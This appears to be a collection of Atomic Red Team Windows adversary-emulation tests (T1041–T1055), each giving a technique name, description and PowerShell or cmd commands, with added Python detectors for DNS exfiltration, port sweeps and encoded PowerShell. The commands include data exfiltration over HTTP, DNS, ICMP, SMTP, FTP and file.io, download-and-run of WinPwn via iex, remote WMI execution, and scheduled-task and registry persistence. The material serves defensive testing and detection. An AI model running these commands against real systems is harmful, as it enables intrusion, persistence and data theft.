Remove-NetEventSession -Name Capture007
T1041 powershell windows C2 Data Exfiltration
Exfiltration Over C2 Channel
Exfiltrates a file present on the victim machine to the C2 server.
if(-not (Test-Path #{filepath})){ 
  1..100 | ForEach-Object { Add-Content -Path #{filepath} -Value "This is line $_." }
}
[System.Net.ServicePointManager]::Expect100Continue = $false
$filecontent = Get-Content -Path #{filepath}
Invoke-WebRequest -Uri #{destination_url} -Method POST -Body $filecontent -DisableKeepAlive
T1041 powershell windows Text Based Data Exfiltration using DNS subdomains
Exfiltration Over C2 Channel
Simulates an adversary using DNS tunneling to exfiltrate data over a Command and Control (C2) channel.
$dnsServer = "#{dns_server}"
$exfiltratedData = "#{exfiltrated_data}"
$chunkSize = #{chunk_size}

$encodedData = [System.Text.Encoding]::UTF8.GetBytes($exfiltratedData)
$encodedData = [Convert]::ToBase64String($encodedData)
$chunks = ($encodedData -split "(.{$chunkSize})") | Where-Object { $_ }   # -split with a capture group also emits empty strings between the captures; drop them

foreach ($chunk in $chunks) {
    $dnsQuery = $chunk + "." + $dnsServer
    Resolve-DnsName -Name $dnsQuery
    Start-Sleep -Seconds 5
}
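The HTTP chunk test (T1030) and the DNS subdomain test above split the same kind of Base64 payload in two different ways: the HTTP test encodes each raw chunk separately, the DNS test encodes once and then cuts the Base64 string into labels. Reassembly therefore differs, and a detection that stitches the chunks back together has to know which order was used. The Python below is an added example, not Atomic Red Team code: it re-creates both chunking schemes, reassembles each correctly, and runs a coarse detector over a constructed resolver log that groups long Base64-looking leftmost labels per client and parent domain. The log format, the heuristic and the domain names are assumptions. Note also that plain Base64 contains +, / and =, which are not hostname characters, and that resolvers may fold case; real DNS tunnelling tools use base32 for that reason, and some resolvers may reject the test's queries.

```python
import base64
import re
from collections import defaultdict

LABEL_RE = re.compile(r"^[A-Za-z0-9+/=_-]{8,63}$")   # Base64/base64url alphabet, DNS label length


def dns_style_chunks(data: bytes, chunk_size: int, domain: str) -> list:
    """What the DNS test does: encode everything, then cut the Base64 string into labels."""
    b64 = base64.b64encode(data).decode()
    return [f"{b64[i:i + chunk_size]}.{domain}" for i in range(0, len(b64), chunk_size)]


def http_style_chunks(data: bytes, chunk_size: int) -> list:
    """What the HTTP test does: cut the raw bytes, then Base64-encode each piece separately."""
    return [base64.b64encode(data[i:i + chunk_size]).decode() for i in range(0, len(data), chunk_size)]


def _b64decode_lenient(s: str) -> bytes:
    s = s.replace("-", "+").replace("_", "/")          # accept base64url too
    return base64.b64decode(s + "=" * (-len(s) % 4))


def reassemble_joined(chunks: list) -> bytes:
    """Inverse of dns_style_chunks: concatenate first, decode once."""
    return _b64decode_lenient("".join(chunks))


def reassemble_each(chunks: list) -> bytes:
    """Inverse of http_style_chunks: decode each piece, then concatenate."""
    return b"".join(_b64decode_lenient(c) for c in chunks)


def _looks_encoded(label: str) -> bool:
    # Coarse heuristic: ordinary hostnames are rarely this long with digits or upper case mixed in.
    return bool(LABEL_RE.match(label)) and (any(c.isdigit() for c in label) or any(c.isupper() for c in label))


def extract_dns_exfil(log_lines: list, min_queries: int = 3) -> dict:
    """Group suspicious leftmost labels per (client, parent domain) and try to decode them.
    Input lines: '<timestamp> <client> QUERY <qname>' (constructed format). Case is kept
    as logged, because Base64 depends on it."""
    buckets = defaultdict(list)
    for line in log_lines:
        _, client, _, qname = line.split()
        label, _, parent = qname.rstrip(".").partition(".")
        if _looks_encoded(label):
            buckets[(client, parent)].append(label)
    results = {}
    for key, labels in buckets.items():
        if len(labels) >= min_queries:
            try:
                results[key] = reassemble_joined(labels)
            except ValueError:
                results[key] = None        # looked encoded but was not Base64
    return results


# Constructed resolver log: one client exfiltrating a short string, plus benign traffic.
SECRET = b"secret text for the lab"
SAMPLE_LOG = (
    [f"2024-05-01T10:00:{i:02d}Z 10.0.0.5 QUERY {q}"
     for i, q in enumerate(dns_style_chunks(SECRET, 12, "exfil.example.test"))]
    + ["2024-05-01T10:00:05Z 10.0.0.9 QUERY www.example.test",
       "2024-05-01T10:00:06Z 10.0.0.9 QUERY mail-server.corp.local"]
)

if __name__ == "__main__":
    print(extract_dns_exfil(SAMPLE_LOG))
    print(reassemble_each(http_style_chunks(SECRET, 11)))
```

For the HTTP variant the same reassemble_each call applies to the POST bodies pulled from a proxy log; joining those bodies first and decoding once does not recover the file.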
T1046 powershell elevated windows Port Scan NMap for Windows
Network Service Discovery
Scan ports to check for listening ports for the local host 127.0.0.1
nmap #{host_to_scan}
T1046 powershell windows Port Scan using python
Network Service Discovery
Scan ports to check for listening ports with python
python "#(unknown)" -i #{host_ip}
T1046 powershell windows WinPwn - spoolvulnscan
Network Service Discovery
Start MS-RPRN RPC Service Scan using spoolvulnscan function of WinPwn
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
T1046 powershell windows WinPwn - MS17-10
Network Service Discovery
Search for MS17-010 (EternalBlue) vulnerable Windows servers in the domain using the MS17-10 function of WinPwn.
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
T1046 powershell windows WinPwn - bluekeep
Network Service Discovery
Search for bluekeep vulnerable Windows Systems in the domain using bluekeep function of WinPwn. Can take many minutes to complete (~600 seconds in testing on a small domain).
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
T1046 powershell windows WinPwn - fruit
Network Service Discovery
Search for potentially vulnerable web apps (low hanging fruits) using fruit function of WinPwn
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
T1046 powershell windows Port-Scanning /24 Subnet with PowerShell
Network Service Discovery
Scans common ports in a /24 subnet. If no IP address for the target subnet is specified, the test first determines the attacking machine's "primary" IPv4 address and then scans that address's /24. The connection attempts use a timeout in milliseconds to speed up the scan. Note that the atomic might not print any output until the scans are complete.
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
    $ip_list = $ipAddr -split ","
    $ip_list = $ip_list.ForEach({ $_.Trim() })
    Write-Host "[i] IP Address List: $ip_list"

    $ports = #{port_list}

    foreach ($ip in $ip_list) {
        foreach ($port in $ports) {
            Write-Host "[i] Establishing connection to: $ip : $port"
            try {
                $tcp = New-Object Net.Sockets.TcpClient
                $tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
            } catch {}
            if ($tcp.Connected) {
                $tcp.Close()
                Write-Host "Port $port is open on $ip"
            }
        }
    }
} elseif ($ipAddr -notlike "*,*") {
    if ($ipAddr -eq "") {
        # Assumes the "primary" interface is shown at the top
        $interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
        Write-Host "[i] Using Interface $interface"
        $ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress -First 1
    }
    Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
    $subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
    # Always assumes /24 subnet
    Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"

    $ports = #{port_list}
    $subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }

    foreach ($ip in $subnetIPs) {
        foreach ($port in $ports) {
            try {
                $tcp = New-Object Net.Sockets.TcpClient
                $tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
            } catch {}
            if ($tcp.Connected) {
                $tcp.Close()
                Write-Host "Port $port is open on $ip"
            }
        }
    }
} else {
    Write-Host "[Error] Invalid Inputs"
    exit 1
}
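The /24 scanner above builds its target list by string-slicing the local address and then opens one TCP connection per host and port. From the network's side the observable is one source touching many hosts (horizontal sweep) or many ports on one host (vertical scan) within a short window. The Python below is an added example, not Atomic Red Team code: subnet_hosts does the /24 expansion with the ipaddress module, scan_events constructs the connection log such a sweep would leave in firewall or Sysmon Event ID 3 records, and detect_scans applies fixed-window distinct-host and distinct-port thresholds. The thresholds, window size and sample addresses are assumptions to tune for your network.

```python
import ipaddress
from collections import defaultdict


def subnet_hosts(ip: str, prefix: int = 24) -> list:
    """Host addresses of the /prefix network containing ip (what the test builds by slicing the string)."""
    return [str(h) for h in ipaddress.ip_network(f"{ip}/{prefix}", strict=False).hosts()]


def detect_scans(events: list, window: int = 60, host_threshold: int = 20, port_threshold: int = 15) -> dict:
    """Flag sources that, within one fixed window, touched many distinct hosts
    (horizontal sweep) or many distinct ports on one host (vertical scan).
    events: (ts_seconds, src_ip, dst_ip, dst_port) connection attempts.
    Thresholds and window are assumptions to tune per network."""
    hosts = defaultdict(set)    # (src, window) -> destination hosts
    ports = defaultdict(set)    # (src, window, dst) -> destination ports
    for ts, src, dst, dport in events:
        w = int(ts) // window
        hosts[(src, w)].add(dst)
        ports[(src, w, dst)].add(dport)
    findings = defaultdict(list)
    for (src, w), dsts in hosts.items():
        if len(dsts) >= host_threshold:
            findings[src].append(f"horizontal: {len(dsts)} hosts in window {w}")
    for (src, w, dst), ps in ports.items():
        if len(ps) >= port_threshold:
            findings[src].append(f"vertical: {len(ps)} ports on {dst} in window {w}")
    return dict(findings)


def scan_events(src: str, target_ip: str, port_list: list, start: float = 0.0, gap: float = 0.01) -> list:
    """Constructed connection log for the /24 sweep the test performs."""
    out, t = [], start
    for dst in subnet_hosts(target_ip):
        for p in port_list:
            out.append((t, src, dst, p))
            t += gap
    return out


# Constructed sample: the sweep, a vertical scan from a second host, and two benign connections.
SAMPLE_EVENTS = (
    scan_events("10.0.0.5", "192.168.1.17", [22, 80, 443, 445, 3389])
    + [(100 + i, "10.0.0.7", "192.168.1.20", p) for i, p in enumerate(range(1, 21))]
    + [(1.0, "10.0.0.9", "192.168.1.10", 443), (2.0, "10.0.0.9", "192.168.1.11", 445)]
)

if __name__ == "__main__":
    for src, f in detect_scans(SAMPLE_EVENTS).items():
        print(src, f)
```

Failed connection attempts are the useful signal here; a sweep of a mostly empty /24 leaves far more SYNs without a completed handshake than completed connections, so make sure the log source you test against records them.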
T1046 powershell elevated windows Remote Desktop Services Discovery via PowerShell
Network Service Discovery
Availability of Remote Desktop Services can be checked using the Get-Service cmdlet of PowerShell.
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
T1047 command_prompt windows WMI Reconnaissance Users
Windows Management Instrumentation
An adversary might use WMI to list all local user accounts. When the test completes, local user account information is displayed on the command line.
wmic useraccount get /ALL /format:csv
T1047 command_prompt windows WMI Reconnaissance Processes
Windows Management Instrumentation
An adversary might use WMI to list processes running on the compromised host. When the test completes, the running processes are listed on the command line.
wmic process get caption,executablepath,commandline /format:csv
T1047 command_prompt windows WMI Reconnaissance Software
Windows Management Instrumentation
An adversary might use WMI to list installed hotfixes and patches. When the test completes, there should be a list of installed patches and when they were installed.
wmic qfe get description,installedOn /format:csv
T1047 command_prompt windows WMI Reconnaissance List Remote Services
Windows Management Instrumentation
An adversary might use WMI to check whether a certain service is running on a remote device. When the test completes, the service information is displayed if the service exists. If the queried service is not running, wmic prints "No Instance(s) Available"; if the remote host is unreachable, it prints "Node - (provided IP or default) ERROR Description = The RPC server is unavailable".
wmic /node:"#{node}" service where (caption like "%#{service_search_string}%")
T1047 command_prompt windows WMI Execute Local Process
Windows Management Instrumentation
This test uses wmic.exe to execute a process on the local host. When the test completes, a new process is started locally; with the default input, Notepad is launched.
wmic process call create #{process_to_execute}
T1047 command_prompt windows WMI Execute Remote Process
Windows Management Instrumentation
This test uses wmic.exe to execute a process on a remote host. Specify a valid remote IP with the node parameter. To clean up, provide the same node input as the one used to run the test. A common error message is "Node - (provided IP or default) ERROR Description = The RPC server is unavailable" if the default or provided IP is unreachable.
wmic /user:#{user_name} /password:#{password} /node:"#{node}" process call create #{process_to_execute}
T1047 command_prompt windows Create a Process using WMI Query and an Encoded Command
Windows Management Instrumentation
Solarigate persistence is achieved via backdoors deployed with various techniques, including PowerShell with an encoded command:
Powershell -nop -exec bypass -EncodedCommand <encoded command>
where the -EncodedCommand, once decoded, would resemble:
Invoke-WMIMethod win32_process -name create -argumentlist 'rundll32 c:\windows\idmu\common\ypprop.dll _XInitImageFuncPtrs' -ComputerName WORKSTATION
The EncodedCommand in this atomic decodes to: Invoke-WmiMethod -Path win32_process -Name create -ArgumentList notepad.exe
You should expect to see notepad.exe running after execution of this test. [Solarigate Analysis from Microsoft](https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/)
powershell -exec bypass -e SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AUABhAHQAaAAgAHcAaQBuADMAMgBfAHAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIABjAHIAZQBhAHQAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIABuAG8AdABlAHAAYQBkAC4AZQB4AGUA
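The registry-staged encoded command at the top of this section and the Solarigate-style -EncodedCommand here both end in the same place: Base64 of UTF-16LE PowerShell that IEX or powershell.exe decodes at run time. The Python below is an added example, not Atomic Red Team code, that does the analyst's side: it mirrors the test's encoder, decodes any -e/-enc/-EncodedCommand argument found in a command line (powershell.exe accepts those abbreviations), and flags the registry-staging pattern of FromBase64String wrapped around a Get-ItemProperty/gp read that is then passed to IEX. The first sample is the encoded command from the test above, verbatim; the registry path and value name in the second sample are stand-ins for the test's parameters.

```python
import base64
import re

# Abbreviations powershell.exe accepts for -EncodedCommand (it resolves unambiguous prefixes).
_ENC_RE = re.compile(
    r"-(?:e|ec|en|enc|enco|encod|encode|encoded|encodedc|encodedco|encodedcom|"
    r"encodedcomm|encodedcomma|encodedcomman|encodedcommand)\s+['\"]?([A-Za-z0-9+/]+={0,2})",
    re.IGNORECASE,
)
# Registry-staged variant: a value read back with Get-ItemProperty/gp, Base64-decoded,
# and handed to Invoke-Expression/IEX.
_REG_STAGE_RE = re.compile(r"FromBase64String\s*\(.*?\b(?:gp|Get-ItemProperty)\b", re.IGNORECASE | re.DOTALL)
_IEX_RE = re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.IGNORECASE)


def encode_powershell(command: str) -> str:
    """Same transform as the test's encoder: UTF-16LE bytes, then Base64."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_powershell(encoded: str) -> str:
    raw = base64.b64decode(encoded, validate=True)
    if len(raw) % 2:
        raise ValueError("odd byte count: not UTF-16LE, so not a PowerShell encoded command")
    return raw.decode("utf-16-le")


def triage(cmdline: str) -> dict:
    """Decode every -EncodedCommand argument and flag the registry-staging pattern."""
    decoded = []
    for m in _ENC_RE.finditer(cmdline):
        try:
            decoded.append(decode_powershell(m.group(1)))
        except (ValueError, UnicodeDecodeError):
            continue        # -e followed by something that is not an encoded command
    staged = bool(_REG_STAGE_RE.search(cmdline) and _IEX_RE.search(cmdline))
    return {"decoded": decoded, "registry_staged": staged}


# The encoded command from the Solarigate-style test above, verbatim.
SOLARIGATE_B64 = ("SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AUABhAHQAaAAgAHcAaQBuADMAMgBfAHAAcgBvAGMAZQBz"
                  "AHMAIAAtAE4AYQBtAGUAIABjAHIAZQBhAHQAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIABuAG8AdABlAHAA"
                  "YQBkAC4AZQB4AGUA")

# Constructed command lines; the registry path and value name stand in for the test's parameters.
SAMPLE_COMMANDLINES = [
    f"powershell -exec bypass -e {SOLARIGATE_B64}",
    'powershell.exe -Command "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String('
    '(gp HKCU:\\Software\\Classes\\LabStage LabValue).LabValue)))"',
    "powershell.exe -NoProfile -Command Get-Date",
]

if __name__ == "__main__":
    for c in SAMPLE_COMMANDLINES:
        print(triage(c))
```

Sysmon Event ID 1 CommandLine and PowerShell script block logging (Event ID 4104) are the usual inputs. Decode before matching: the registry-staged variant never shows its payload on the command line at all, which is why the staging pattern itself is the detection there.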
T1047 powershell elevated windows Create a Process using obfuscated Win32_Process
Windows Management Instrumentation
This test tries to mask process creation by creating a new class that inherits from Win32_Process. An indirect call of a suspicious method such as Win32_Process::Create can break detection logic. [Cybereason blog post: No Win32_Process Needed](https://www.cybereason.com/blog/wmi-lateral-movement-win32)
$Class = New-Object Management.ManagementClass(New-Object Management.ManagementPath("Win32_Process"))
$NewClass = $Class.Derive("#{new_class}")
$NewClass.Put()
Invoke-WmiMethod -Path #{new_class} -Name create -ArgumentList #{process_to_execute}
T1047 command_prompt windows WMI Execute rundll32
Windows Management Instrumentation
This test uses wmic.exe to execute a DLL function using rundll32. Specify a valid value for remote IP using the node parameter.
wmic /node:#{node} process call create "rundll32.exe \"#{dll_to_execute}\" #{function_to_execute}"
T1047 command_prompt elevated windows Application uninstall using WMIC
Windows Management Instrumentation
Emulates uninstalling applications using WMIC. This method only works if the product was installed from an MSI file. APTs have been seen using this to uninstall security products.
wmic /node:"#{node}" product where "name like '#{product}%%'" call uninstall
T1048 powershell windows DNSExfiltration (doh)
Exfiltration Over Alternative Protocol
DNSExfiltrator enables the transfer (exfiltration) of a file over a DNS request covert channel. It is essentially a data leak testing tool that allows you to exfiltrate data over a covert channel. !!! The test will fail without a domain under your control with an A record and an NS record !!! See this GitHub page for more details: https://github.com/Arno0x/DNSExfiltrator
Import-Module "#{ps_module}"
Invoke-DNSExfiltrator -i "#{ps_module}" -d #{domain} -p #{password} -doh #{doh} -t #{time} #{encoding}
T1048.002 command_prompt windows Exfiltrate data HTTPS using curl windows
Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Exfiltrate data over HTTPS using curl to the file-sharing site file.io.
#{curl_path} -k -F "file=@#{input_file}" https://file.io/
T1048.003 powershell windows Exfiltration Over Alternative Protocol - ICMP
Exfiltration Over Unencrypted Non-C2 Protocol
Exfiltration of the specified file over the ICMP protocol. Upon successful execution, PowerShell will use ping (ICMP) to exfiltrate notepad.exe to a remote address (default 127.0.0.1). Results will be output via stdout.
$ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("#{ip_address}", 1500, $Data) }
T1048.003 powershell windows Exfiltration Over Alternative Protocol - HTTP
Exfiltration Over Unencrypted Non-C2 Protocol
Exfiltration of the specified file over HTTP. Upon successful execution, PowerShell will invoke a web request using the POST method to exfiltrate notepad.exe to a remote address (default http://127.0.0.1). Results will be output via stdout.
$content = Get-Content #{input_file}
Invoke-WebRequest -Uri #{ip_address} -Method POST -Body $content
T1048.003 powershell windows Exfiltration Over Alternative Protocol - SMTP
Exfiltration Over Unencrypted Non-C2 Protocol
Exfiltration of the specified file over SMTP. Upon successful execution, PowerShell will send an email with the file to exfiltrate attached to a remote address. Results will be output via stdout.
Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1048.003 Atomic Test" -Attachments #{input_file} -SmtpServer #{smtp_server}
T1048.003 powershell windows MAZE FTP Upload
Exfiltration Over Unencrypted Non-C2 Protocol
This test simulates MAZE ransomware's ability to exfiltrate data via FTP. Upon successful execution, all 7z files within the %windir%\temp directory will be uploaded to a remote FTP server. Reference: https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents
$Dir_to_copy = "$env:windir\temp"
$ftp = "ftp://#{ftp_server}/"
$web_client = New-Object System.Net.WebClient
$web_client.Credentials = New-Object System.Net.NetworkCredential('#{username}', '#{password}')
if (test-connection -count 1 -computername "#{ftp_server}" -quiet)
{foreach($file in (dir $Dir_to_copy "*.7z"))
{echo "Uploading $file..."
$uri = New-Object System.Uri($ftp+$file.name)
$web_client.UploadFile($uri, $file.FullName)}}
else
{echo "FTP Server Unreachable. Please verify the server address in input args and try again."}
T1048.003 powershell elevated windows Exfiltration Over Alternative Protocol - FTP - Rclone
Exfiltration Over Unencrypted Non-C2 Protocol
Rclone may be used by an adversary to exfiltrate data to a publicly hosted FTP server. [Reference](https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/)
$rclone_bin = Get-ChildItem C:\Users\Public\Downloads\ -Recurse -Include "rclone.exe" | Select-Object -ExpandProperty FullName
$exfil_pack = Get-ChildItem C:\Users\Public\Downloads\ -Recurse -Include "exfil.zip" | Select-Object -ExpandProperty FullName
&$rclone_bin config create ftpserver "ftp" "host" #{ftp_server} "port" #{ftp_port} "user" #{ftp_user} "pass" #{ftp_pass}
&$rclone_bin copy --max-age 2y $exfil_pack ftpserver --bwlimit 2M -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12 -P --ftp-no-check-certificate
T1049 command_prompt windows System Network Connections Discovery
System Network Connections Discovery
Get a listing of network connections. Upon successful execution, cmd.exe will execute netstat, net use and net sessions. net sessions requires elevated privileges; on standard user accounts this command may not return results. Results will be output via stdout.
netstat -ano
net use
net sessions 2>nul
T1049 powershell windows System Network Connections Discovery with PowerShell
System Network Connections Discovery
Get a listing of network connections. Upon successful execution, powershell.exe will execute Get-NetTCPConnection. Results will be output via stdout.
Get-NetTCPConnection
T1049 powershell windows System Network Connections Discovery via PowerShell (Process Mapping)
System Network Connections Discovery
Enumerate TCP connections and map to owning process names via PowerShell.
Get-NetTCPConnection | ForEach-Object {
  $p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
  [pscustomobject]@{
    Local   = "$($_.LocalAddress):$($_.LocalPort)"
    Remote  = "$($_.RemoteAddress):$($_.RemotePort)"
    State   = $_.State
    PID     = $_.OwningProcess
    Process = if ($p) { $p.ProcessName } else { $null }
  }
} | Sort-Object State,Process | Format-Table -AutoSize
T1049 powershell elevated windows System Discovery using SharpView
System Network Connections Discovery
Get a listing of network connections, domains, domain users, etc. using sharpview.exe, an open-source red-team tool located in the bin folder. Upon successful execution, cmd.exe will execute sharpview.exe <method>. Results will be output via stdout.
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
T1053.002 command_prompt windows At.exe Scheduled task
At
Executes cmd.exe. Note: deprecated in Windows 8+. Upon successful execution, cmd.exe will spawn at.exe and create a scheduled task that will spawn cmd at a specific time.
at 13:20 /interactive cmd
T1053.005 command_prompt elevated windows Scheduled Task Startup Script
Scheduled Task
Run an exe on user logon or system startup. Upon execution, success messages will be displayed for the two scheduled tasks. To view the tasks, open the Task Scheduler and look in the Active Tasks pane.
schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"
schtasks /create /tn "T1053_005_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe"
T1053.005 command_prompt windows Scheduled task Local
Scheduled Task
Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10.
SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
T1053.005 command_prompt elevated windows Scheduled task Remote
Scheduled Task
Create a task on a remote system. Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10 on a remote endpoint.
SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
T1053.005 powershell windows Powershell Cmdlet Scheduled Task
Scheduled Task
Create an atomic scheduled task that leverages native powershell cmdlets. Upon successful execution, powershell.exe will create a scheduled task to spawn cmd.exe at 20:10.
$Action = New-ScheduledTaskAction -Execute "calc.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTask -InputObject $object
T1053.005 powershell windows Task Scheduler via VBA
Scheduled Task
This module utilizes the Windows API to schedule a task for code execution (notepad.exe). The task scheduler will execute "notepad.exe" within 30 to 40 seconds after this module has run.
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) 
Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1053.005\src\T1053.005-macrocode.txt" -officeProduct "#{ms_product}" -sub "Scheduler"
T1053.005 powershell elevated windows WMI Invoke-CimMethod Scheduled Task
Scheduled Task
Create a scheduled task that executes notepad.exe after user login from XML by leveraging the WMI class PS_ScheduledTask. This does the same thing as the Register-ScheduledTask cmdlet does behind the scenes.
$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
T1053.005 command_prompt windows Scheduled Task Executing Base64 Encoded Commands From Registry
Scheduled Task
A Base64-encoded command will be stored in the registry (ping 127.0.0.1) and then a scheduled task will be created. The scheduled task will launch PowerShell daily to decode and run the command stored in the registry. This is a persistence mechanism recently seen in use by Qakbot. [Additional Information](https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/)
reg add HKCU\SOFTWARE\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyAxMjcuMC4wLjE= /f
schtasks.exe /Create /F /TN "ATOMIC-T1053.005" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\SOFTWARE\\ATOMIC-T1053.005).test)))" /sc daily /st #{time}
T1053.005 powershell elevated windows Import XML Schedule Task with Hidden Attribute
Scheduled Task
Create a scheduled task that executes calc.exe after user login from XML that contains the hidden setting attribute. This technique was seen several times in TrickBot malware and also in the targeted attack campaign Industroyer2.
$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
T1053.005 powershell windows PowerShell Modify A Scheduled Task
Scheduled Task
Create a scheduled task with an action and then modify the action to do something else. The idea is to showcase the Microsoft Windows TaskScheduler Operational log entry for modification of an action on an already registered task. The task will first be created to spawn cmd.exe, then modified to run notepad.exe. Upon successful execution, powershell.exe will create a scheduled task and modify its action.
$Action = New-ScheduledTaskAction -Execute "cmd.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTaskModifed -InputObject $object
$NewAction = New-ScheduledTaskAction -Execute "Notepad.exe"
Set-ScheduledTask "AtomicTaskModifed" -Action $NewAction
T1053.005 command_prompt elevated windows Scheduled Task ("Ghost Task") via Registry Key Manipulation
Scheduled Task
Create a scheduled task through manipulation of registry keys. This procedure is implemented using the [GhostTask](https://github.com/netero1010/GhostTask) utility. By manipulating registry keys under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree, the tool creates user-specified scheduled tasks without a corresponding Windows Event 4698, which is logged when scheduled tasks are created through conventional means. This requires a download of the GhostTask binary, which must be run as NT Authority\SYSTEM. Upon successful execution of this test, a scheduled task will be set to run at logon which launches notepad.exe or runs a user-specified command. For further exploration of this procedure and guidance for hunting and detection, see [Hunting G-G-G-GhostTasks!](https://medium.com/p/154b50ab6a78).
"PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" \\#{target} -accepteula -s "cmd.exe"
"PathToAtomicsFolder\..\ExternalPayloads\GhostTask.exe" \\#{target} add #{task_name} "cmd.exe" "/c #{task_command}" #{user_name} logon
T1053.005 command_prompt elevated windows Scheduled Task Persistence via CompMgmt.msc
Scheduled Task
Adds persistence by abusing compmgmt.msc via a scheduled task. When the Computer Management console is opened, it will run a malicious payload (in this case, calc.exe). This technique abuses scheduled tasks and registry modifications to hijack legitimate system processes.
reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "compmgmt.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's open the Computer Management console now...
compmgmt.msc
T1053.005 command_prompt elevated windows Scheduled Task Persistence via Eventviewer.msc
Scheduled Task
Adds persistence by abusing eventviewer.msc via a scheduled task. When the eventviewer console is opened, it will run a malicious payload (in this case, calc.exe).
reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "eventvwr.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's run the schedule task ...
schtasks /Run /TN "EventViewerBypass"
T1055 powershell windows Shellcode execution via VBA
Process Injection
This module injects shellcode into a newly created process and executes it. By default the shellcode is created with Metasploit for use on x86-64 Windows 10 machines. Note: due to the way the VBA code handles memory/pointers/injection, a 64-bit installation of Microsoft Office is required.
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
